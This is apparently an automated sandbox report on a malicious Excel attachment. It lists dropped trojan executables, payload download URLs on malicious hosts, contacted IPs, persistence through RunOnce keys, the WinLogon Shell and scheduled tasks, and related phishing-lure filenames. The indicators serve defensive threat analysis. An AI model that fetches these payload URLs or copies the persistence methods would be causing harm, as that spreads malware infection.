Required Order Quantity.xlsx	23%	ReversingLabs	Document-Office.Exploit.Heuristic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	100%	Avira	TR/Dropper.Gen
C:\Users\Public\vbc.exe	100%	Avira	TR/Dropper.Gen
C:\Windows\system\svchost.exe	100%	Avira	TR/Dropper.Gen
C:\Windows\system\explorer.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\icsys.icn.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\mrsys.exe	100%	Avira	TR/Dropper.Gen
C:\Windows\system\spoolsv.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\stsys.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	100%	Joe Sandbox ML
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Windows\system\svchost.exe	100%	Joe Sandbox ML
C:\Windows\system\explorer.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\icsys.icn.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\mrsys.exe	100%	Joe Sandbox ML
C:\Windows\system\spoolsv.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\stsys.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
11.0.spoolsv.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
9.0.spoolsv.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
8.0.explorer.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
8.1.explorer.exe.2540000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
9.2.spoolsv.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
8.2.explorer.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
11.2.spoolsv.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
7.0.icsys.icn.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
4.0.vbc.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
10.2.svchost.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
4.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
10.1.svchost.exe.1d90000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
4.1.vbc.exe.2c20000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
7.2.icsys.icn.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
10.0.svchost.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://vccmd02.googlecode.com/files/cmsys.gif4	0%	Avira URL Cloud	safe
http://vccmd03.googlecode.com/files/cmsys.gif	0%	Avira URL Cloud	safe
https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin	0%	Avira URL Cloud	safe
http://vccmd02.googlecode.com/files/cmsys.gif	0%	Avira URL Cloud	safe
http://103.141.138.118/bin_iOxAb78.bin	0%	Avira URL Cloud	safe
http://vccmd02.googlecode.com/files/cmsys.gifuVwzFlRdVmuMSmtmQbIqqyE	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://vccmd01.zxq.net/cmsys.gifr	0%	Avira URL Cloud	safe
http://vccmd01.googlecode.com/files/cmsys.giffi	0%	Avira URL Cloud	safe
http://vccmd02.googlecode.com/files/cmsys.gif.exe	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://vccmd01.googlecode.com/files/cmsys.gif	0%	Avira URL Cloud	safe
http://vccmd01.t35.com/cmsys.gifr	0%	Avira URL Cloud	safe
http://vccmd01.t35.com/cmsys.gif8X;E	0%	Avira URL Cloud	safe
www.evolvekitchendesign.com/ffw/	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://vccmd02.googlecode.com/filesoLgFqAfjBmuVwzFlRdVmuMSmtmQbIqqyE	0%	Avira URL Cloud	safe
http://vccmd01.zxq.net/cmsys.gif	0%	Avira URL Cloud	safe
http://vccmd03.googlecode.com/files/cmsys.gif)	0%	Avira URL Cloud	safe
http://stdyworkfinetraingst.dns.army/findoc/svchost.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chapelcouture.com	34.102.136.180	true	true	unknown
stdyworkfinetraingst.dns.army	103.141.138.118	true	true	unknown
demo.sdssoftltd.co.uk	103.67.236.191	true	true	unknown
fqe.short.gy	52.59.165.42	true	false	unknown
googlecode.l.googleusercontent.com	74.125.143.82	true	false	high
vccmd03.googlecode.com	unknown	unknown	true	unknown
vccmd01.t35.com	unknown	unknown	true	unknown
vccmd01.googlecode.com	unknown	unknown	true	unknown
vccmd02.googlecode.com	unknown	unknown	true	unknown
www.chapelcouture.com	unknown	unknown	true	unknown
vccmd01.zxq.net	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://vccmd03.googlecode.com/files/cmsys.gif	false	Avira URL Cloud: safe	unknown
https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78	true		unknown
http://vccmd02.googlecode.com/files/cmsys.gif	false	Avira URL Cloud: safe	unknown
http://vccmd01.googlecode.com/files/cmsys.gif	false	Avira URL Cloud: safe	unknown
www.evolvekitchendesign.com/ffw/	true	Avira URL Cloud: safe	low
http://stdyworkfinetraingst.dns.army/findoc/svchost.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://vccmd02.googlecode.com/files/cmsys.gif4	explorer.exe, 00000008.00000002.2236791163.00000000008E6000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.windows.com/pctv.	vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	false		high
http://investor.msn.com	vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	false		high
https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin	vbc.exe	true	Avira URL Cloud: safe	unknown
http://103.141.138.118/bin_iOxAb78.bin	vbc.exe	false	Avira URL Cloud: safe	unknown
http://vccmd02.googlecode.com/files/cmsys.gifuVwzFlRdVmuMSmtmQbIqqyE	explorer.exe, 00000008.00000002.2236947753.0000000000927000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	false		high
http://vccmd01.zxq.net/cmsys.gifr	explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.googlecode.com/files/cmsys.giffi	explorer.exe, 00000008.00000002.2236780419.00000000008D8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd02.googlecode.com/files/cmsys.gif.exe	explorer.exe, 00000008.00000002.2236727117.0000000000894000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	vbc.exe , 00000005.00000002.2198957160.00000000033A7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000004.00000002.2187372005.0000000002CC0000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.2365850522.0000000000F70000.00000002.00000001.sdmp, icsys.icn.exe, 00000007.00000002.2187194391.0000000002C40000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2237647374.0000000002C00000.00000002.00000001.sdmp	false		high
http://vccmd01.t35.com/cmsys.gifr	explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.t35.com/cmsys.gif8X;E	explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	vbc.exe , 00000005.00000002.2197641797.00000000031C0000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	vbc.exe, 00000004.00000002.2187372005.0000000002CC0000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.2365850522.0000000000F70000.00000002.00000001.sdmp, icsys.icn.exe, 00000007.00000002.2187194391.0000000002C40000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2237647374.0000000002C00000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://vccmd02.googlecode.com/filesoLgFqAfjBmuVwzFlRdVmuMSmtmQbIqqyE	explorer.exe, 00000008.00000002.2236947753.0000000000927000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd01.zxq.net/cmsys.gif	explorer.exe, 00000008.00000002.2236767990.00000000008CD000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://vccmd03.googlecode.com/files/cmsys.gif)	explorer.exe, 00000008.00000002.2236791163.00000000008E6000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
52.59.165.42	fqe.short.gy	United States	16509	AMAZON-02US	false
103.141.138.118	stdyworkfinetraingst.dns.army	Viet Nam	135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true
103.67.236.191	demo.sdssoftltd.co.uk	India	135779	OASISGSSERVICES-ASOASISGSSERVICESIN	true
74.125.143.82	googlecode.l.googleusercontent.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.255

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385184
Start date:	12.04.2021
Start time:	07:42:46
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Required Order Quantity.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLSX@170/31@12/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 8.3% (good quality ratio 6.3%) Quality average: 51.3% Quality standard deviation: 33.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Excluded IPs from analysis (whitelisted): 192.35.177.64, 205.185.216.42, 205.185.216.10, 2.20.142.209, 2.20.142.210 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, apps.digsigtrust.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtWriteVirtualMemory calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/385184/sample/Required Order Quantity.xlsx

Simulations

Behavior and APIs

Time	Type	Description
07:47:06	API Interceptor	62x Sleep call for process: EQNEDT32.EXE modified
07:47:15	API Interceptor	1119x Sleep call for process: svchost.exe modified
07:47:25	API Interceptor	282x Sleep call for process: explorer.exe modified
07:47:26	API Interceptor	15x Sleep call for process: at.exe modified
07:47:27	Task Scheduler	Run new task: At1 path: c:\windows\system\svchost.exe
07:47:27	API Interceptor	208x Sleep call for process: vbc.exe modified
07:47:27	API Interceptor	200x Sleep call for process: taskeng.exe modified
07:47:29	Autostart	Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\system\explorer.exe RO
07:47:35	Task Scheduler	Run new task: At2 path: c:\windows\system\svchost.exe
07:47:37	Autostart	Run: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\system\svchost.exe RO
07:47:54	Autostart	Run: WinLogon Shell C:\Windows\explorer.exe
07:48:02	Autostart	Run: WinLogon Shell c:\windows\system\explorer.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
52.59.165.42	Payment advice IN18663Q0031139I.xlsx	Get hash	malicious	Browse
	NEW ORDER.xlsx	Get hash	malicious	Browse
	Purchase Order SC_695853.xlsx	Get hash	malicious	Browse
	http://announcement.smarttechresources.net/track.aspx?6OxJvzbWgtyuD1z1ovZRjhA7oCeMofncfehKrR8LacCTunDd8llWUsge4AR9zTiorDL1aZ4kAoU=	Get hash	malicious	Browse
103.141.138.118	MKDRPSJS9E999494993.xlsx	Get hash	malicious	Browse	stdyworkfinetraistfh.dns.army/findoc/svchost.exe
	Al Rabiah Trade Requirment.xlsx	Get hash	malicious	Browse	stdyworkfinetraistfh.dns.army/findoc/svchost.exe
	draft bill VCSC2100266.xlsx	Get hash	malicious	Browse	workfinewsdytraistbk.dns.army/findoc/svchost.exe
	New Order March.xlsx	Get hash	malicious	Browse	stdyworkfinetraistmg.dns.army/findoc/svchost.exe
	March Order 4th.xlsx	Get hash	malicious	Browse	thdyworkfinerainball.dns.army/findoc/svchost.exe?platform=hootsuite
	BC748484HC9484847DCD.xlsx	Get hash	malicious	Browse	thdyworkfinerainbows.dns.army/findoc/svchost.exe?platform=hootsuite
	Order 25th Feb.xlsx	Get hash	malicious	Browse	thdyworkfinerainbows.dns.army/findoc/svchost.exe?platform=hootsuite
	Tyre Order 24th February.xlsx	Get hash	malicious	Browse	thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite
	Booking.xlsx	Get hash	malicious	Browse	thdyworkfinerainbotm.dns.army/findoc/svchost.exe?platform=hootsuite
	22-2-2021 .xlsx	Get hash	malicious	Browse	thdyworkfinerainbotm.dns.army/findoc/svchost.exe
	17-02 Requirment.xlsx	Get hash	malicious	Browse	workfinestdyrainbost.dns.army/findoc/svchost.exe
	New-Order Requirment.xlsx	Get hash	malicious	Browse	workfinestdyrainbost.dns.army/findoc/svchost.exe
	Inquiry from Pure fine food Ltd.xlsx	Get hash	malicious	Browse	workfinestdyrainbost.dns.army/findoc/svchost.exe
	Debtor_Statement.xlsx	Get hash	malicious	Browse	workfinestdyrainbost.dns.army/findoc/svchost.exe
	Order 34.xlsx	Get hash	malicious	Browse	wsdyworkfinerainbows.dns.army/receipwt/svchost.exe
	3rd February Order Request.xlsx	Get hash	malicious	Browse	workfinestdyrainbost.dns.army/receipwt/svchost.exe
	Order Requirment.xlsx	Get hash	malicious	Browse	workfinestdyrainbost.dns.army/receipwt/svchost.exe
	Vietcong Order February.xlsx	Get hash	malicious	Browse	workfinestdyrainbost.dns.army/receipwt/svchost.exe
	Tyre List.xlsx	Get hash	malicious	Browse	wsdyworkfinerainbows.dns.army/receipwt/svchost.exe
	New -PO January.xlsx	Get hash	malicious	Browse	wsdyworkfinesanothws.dns.navy/worksdoc/svchost.exe
103.67.236.191	https://tny.sh/0ssxBTp	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
fqe.short.gy	Proforma Invoice.xlsx	Get hash	malicious	Browse	18.184.197.212
	Payment advice IN18663Q0031139I.xlsx	Get hash	malicious	Browse	52.59.165.42
	NEW ORDER.xlsx	Get hash	malicious	Browse	52.59.165.42
	Purchase Order SC_695853.xlsx	Get hash	malicious	Browse	52.59.165.42

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	Proforma Invoice.xlsx	Get hash	malicious	Browse	18.184.197.212
	Payment advice IN18663Q0031139I.xlsx	Get hash	malicious	Browse	52.59.165.42
	NEW ORDER.xlsx	Get hash	malicious	Browse	52.59.165.42
	Purchase Order SC_695853.xlsx	Get hash	malicious	Browse	52.59.165.42
	winlog.exe	Get hash	malicious	Browse	3.14.206.30
	J6wDHe2QdA.exe	Get hash	malicious	Browse	3.22.15.135
	hsOBwEXSsq.exe	Get hash	malicious	Browse	3.142.167.54
	1B4AF276CB3E0BFC9709174B8F75E13C4B224F4B35A6E.exe	Get hash	malicious	Browse	3.13.191.225
	36ne6xnkop.exe	Get hash	malicious	Browse	99.83.185.45
	1ucvVfbHnD.exe	Get hash	malicious	Browse	3.13.255.157
	Wire Transfer Update.exe	Get hash	malicious	Browse	3.13.255.157
	Five.exe	Get hash	malicious	Browse	52.84.150.34
	Pd0Tb0v0WW.exe	Get hash	malicious	Browse	52.58.78.16
	Alexandra38.docx	Get hash	malicious	Browse	65.9.66.79
	Alexandra38.docx	Get hash	malicious	Browse	65.9.66.79
	LtfVNumoON.exe	Get hash	malicious	Browse	13.56.33.8
	mW07jhVxX5.exe	Get hash	malicious	Browse	35.157.204.206
	giATspz5dw.exe	Get hash	malicious	Browse	52.15.160.167
	rRobw1VVRP.exe	Get hash	malicious	Browse	54.202.57.165
	Player.app.zip	Get hash	malicious	Browse	13.224.89.127
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	Proforma Invoice.xlsx	Get hash	malicious	Browse	103.133.108.6
	Payment advice IN18663Q0031139I.xlsx	Get hash	malicious	Browse	103.141.138.133
	NEW ORDER.xlsx	Get hash	malicious	Browse	103.125.191.170
	Purchase Order SC_695853.xlsx	Get hash	malicious	Browse	103.133.106.243
	PRC-20-518 ORIGINAL.xlsx	Get hash	malicious	Browse	103.141.138.69
	CNTR-NO-GLDU7267089.xlsx	Get hash	malicious	Browse	103.133.108.6
	SwiftMT103.xlsx	Get hash	malicious	Browse	103.99.1.149
	Purchase Order.xlsx	Get hash	malicious	Browse	103.141.138.117
	SPARE PARTS drawing.xlsx	Get hash	malicious	Browse	103.133.106.243
	IN18663Q0031139I.xlsx	Get hash	malicious	Browse	103.141.138.133
	ShipDoc_CI_PL_INV_.xlsx	Get hash	malicious	Browse	103.141.138.117
	PROFORMA INVOICE.xlsx	Get hash	malicious	Browse	103.141.138.132
	PRC-20-518 ORIGINAL.xlsx	Get hash	malicious	Browse	103.141.138.69
	invoice.xlsx	Get hash	malicious	Browse	103.133.108.6
	PR_A1191-04052021.xlsx	Get hash	malicious	Browse	103.99.1.149
	Quotation Zhejiang.xlsx	Get hash	malicious	Browse	103.141.138.117
	HL-57269806 TRMER.xlsx	Get hash	malicious	Browse	103.139.45.23
	Updated SOA.xlsx	Get hash	malicious	Browse	103.141.138.133
	RFQ_ V-21-Kiel-050-D02.xlsx	Get hash	malicious	Browse	103.140.251.164
	Statement of Account.xlsx	Get hash	malicious	Browse	103.125.191.187
OASISGSSERVICES-ASOASISGSSERVICESIN	0f9zzITIbk.exe	Get hash	malicious	Browse	103.67.239.158
OASISGSSERVICES-ASOASISGSSERVICESIN	Emmmmmmm.doc	Get hash	malicious	Browse	103.67.239.35

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	Proforma Invoice.xlsx	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	Payment advice IN18663Q0031139I.xlsx	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	NEW ORDER.xlsx	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	Purchase Order SC_695853.xlsx	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	Alexandra38.docx	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	fileshare.doc	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	documents-351331057.xlsm	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	documents-1819557117.xlsm	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	IMAGE20210406_490133692.exe.exe	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	Documents_460000622_1464906353.xls	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	Invoice copyt2.pps	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	Invoice copy.ppt	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	Invoice copy.ppt	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	Scan emco Bautechni specification.pps	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	PRESUPUESTO.xlsx	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	Scan emco Bautechni specification.pps	Get hash	malicious	Browse	103.67.236.191 52.59.165.42
	Notice-039539.xlsm	Get hash	malicious	Browse	103.67.236.191 52.59.165.42

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:	dropped
Size (bytes):	58596
Entropy (8bit):	7.995478615012125
Encrypted:	true
SSDEEP:	1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5:	61A03D15CF62612F50B74867090DBE79
SHA1:	15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256:	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512:	5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious:	false
Preview:	MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............\|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>..V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..\|0.+?.`-../.xvy..e......w.+^...w\|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g\|.z..+.D8.m..F .h............ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.1148647443996618
Encrypted:	false
SSDEEP:	6:kKQHwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:oHwTJrkPlE99SNxAhUe0ht
MD5:	77CC1D6B58C1B27A7F0FA29CE9F2AD8F
SHA1:	F3392B4A6234DFD549F630064EBA40F22867F8B9
SHA-256:	0C5E7A466378770D2CFE2C9EB8531FC71336950FAE97DB6D85158BFE0D18A94F
SHA-512:	AE27D38466827579E70A343C269C7DB91CD8CA7D4A84D795D225E96E04879ED44263B2BD1C1E30537E01E6038F33A73D78D0E42FDC8FB14F7C2257047E90B510
Malicious:	false
Preview:	p...... ............./..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	2.979010474252438
Encrypted:	false
SSDEEP:	3:kkFkl79vfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPWl9:kKkyQE1liBAIdQZV7ulPPN
MD5:	B9E53589AFB298B118C45111A1C25186
SHA1:	5AC1F22169CB4016BA05F44853BBA04DDB5083EE
SHA-256:	AD36D1BCDF67273875CF0F5BFC1F8B6D83066014EEBEE1ECA242B909B2A8362E
SHA-512:	C53EBF800965FE39B6FF4E3D649F94619AE6F42DC45417798614CB036799157C32FAC6633D59645C39D5819E19F42D9F052B790E4615EE506664C326C800CDF7
Malicious:	false
Preview:	p...... ....`....e?../..(....................................................... .........\|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	379720
Entropy (8bit):	5.8128747167355925
Encrypted:	false
